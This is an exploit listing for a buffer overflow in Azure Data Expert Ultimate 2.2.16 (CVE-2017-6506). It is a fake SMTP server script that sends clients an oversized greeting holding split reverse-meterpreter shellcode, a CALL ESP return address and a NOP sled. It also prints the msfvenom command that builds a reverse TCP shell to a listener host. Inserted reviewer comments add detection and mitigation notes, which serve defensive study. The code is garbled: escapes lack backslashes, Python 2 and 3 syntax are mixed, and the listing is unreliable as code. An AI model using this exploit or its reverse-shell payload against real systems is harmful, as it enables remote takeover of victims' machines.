Azure Data Expert Ultimate 2.2.16 Buffer Overflow
Posted on 08 March 2017
# Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.azuredex.com/downloads.html
# Version: 2.2.16
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6506

# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.

# Reviewer notes (defensive reading of this listing):
# - The script is a fake SMTP server: every client that connects receives one
#   oversized "220" greeting and is then disconnected. The vulnerable component
#   is therefore the application's SMTP *client* code, which presumably copies
#   the greeting into a fixed-size buffer without a length check (inferred from
#   the CALL ESP gadget below; the exact overwritten control value is not shown here).
# - Detection: an SMTP greeting of several hundred bytes is far beyond the
#   512-octet reply-line limit of RFC 5321 section 4.5.3.1.6; an outbound
#   connection on port 25 that receives such a banner is a usable alert signal.
# - Mitigation: apply the vendor fix for CVE-2017-6506; treat server replies as
#   untrusted input and bound the copy; the fixed gadget address in QtGui4.dll
#   suggests that module is loaded without ASLR (presumably not built with
#   /DYNAMICBASE) -- rebuilding dependencies with ASLR/DEP removes the
#   reliable return target. Network egress control to known mail relays only
#   limits which servers the client can be pointed at.
# - As printed, this listing is not a runnable program: it mixes the Python 2
#   print statement with print() calls, and the string literals do not encode
#   the bytes the comments describe. Treat it as an illustrative listing.

import socket

# QtGui4.dll 0x6527635E - CALL ESP
# Return target: a CALL ESP inside QtGui4.dll, written in little-endian byte
# order. A fixed address only works if the module's load base never changes.
jmp = "x5ex63x27x65"
# Short NOP sled placed directly before the second payload part.
nops = "x90"*8

# reverse meterpreter shell 306 bytes long bad chars x00x0ax0bx20
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b x00x0ax0dx20 --smallest
# The payload is split in two parts because the overwritten region does not
# hold it contiguously: rev_met_2 sits before the return address, rev_met_1
# after it (see the buffer layout below). The byte values are the author's;
# nothing here verifies them.
rev_met_1=("x6ax47x59xd9xeexd9x74x24xf4x5bx81x73x13x1fx2d"
"x97x97x83xebxfcxe2xf4xe3xc5x15x97x1fx2dxf7x1e"
"xfax1cx57xf3x94x7dxa7x1cx4dx21x1cxc5x0bxa6xe5"
"xbfx10x9axddxb1x2exd2x3bxabx7ex51x95xbbx3fxec"
"x58x9ax1exeax75x65x4dx7ax1cxc5x0fxa6xddxabx94"
"x61x86xefxfcx65x96x46x4exa6xcexb7x1exfex1cxde"
"x07xcexadxdex94x19x1cx96xc9x1cx68x3bxdexe2x9a"
"x96xd8x15x77xe2xe9x2exeax6fx24x50xb3xe2xfbx75"
"x1cxcfx3bx2cx44xf1x94x21xdcx1cx47x31x96x44x94"
"x29x1cx96xcfxa4xd3xb3x3bx76xccxf6x46x77xc6x68"
"xffx72xc8xcdx94x3fx7cx1ax42x45xa4xa5x1fx2dxff"
"xe0x6cx1fxc8xc3x77x61xe0xb1x18xd2x42x2fx8fx2c"
"x97x97x36xe9xc3xc7x77x04x17xfcx1fxd2x42xfdx1a"
"x45x57x3fxd9xadxffx95x1fx3cxcbx1exf9x7dxc7xc7"
"x4fx6dxc7xd7x4fx45x7dx98xc0xcdx68x42x88x47x87"
"xc1x48x45x0ex32x6bx4c")

rev_met_2=("x68x42x9axedxe3x9bxe0x63"
"x9fxe2xf3x45x67x22xbdx7bx68x42x75x2dxfdx93x49"
"x7axffx95xc6xe5xc8x68xcaxa6xa1xfdx5fx45x97x87"
"x1fx2dxc1xfdx1fx45xcfx33x4cxc8x68x42x8cx7exfd"
"x97x49x7exc0xffx1dxf4x5fxc8xe0xf8x96x54x36xeb"
"xe2x79xdcx2dx97x97")

# Overflow layout, in the order the bytes reach the client:
#   176 filler bytes | payload part 2 | 2 filler bytes | CALL ESP address
#   | 12 filler bytes | NOP sled | payload part 1
# The offsets (176, 2, 12) are the author's measurements for version 2.2.16
# and cannot be derived from this listing.
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1

port: int = 25
s = socket.socket()
# Binds on every interface, so the fake server is itself reachable from the
# network; a client has to be pointed at this host's port 25 to be affected.
ip: str = '0.0.0.0'
s.bind((ip, port))
s.listen(5)
# Python 2 print statement (the checks below use the print() form).
print 'Listening on SMTP port: '+str(port)

# Sanity checks that each payload part still fits the space the layout above
# reserves for it; the thresholds (236 and 76) are the author's limits and are
# not computed from the offsets. Note that the first check only runs after
# the socket is already bound and listening.
if len(rev_met_1) >= 236:
    print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
    exit(1)
elif len(rev_met_2) >= 76:
    print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
    exit(1)

# Serve every connection with the oversized greeting and close it; the loop
# never terminates on its own. The trailing ' ' is presumably a garbled
# line terminator in this copy of the listing -- confirm against the original.
while True:
    conn, addr = s.accept()
    conn.send('220 '+buffer+' ')
    conn.close()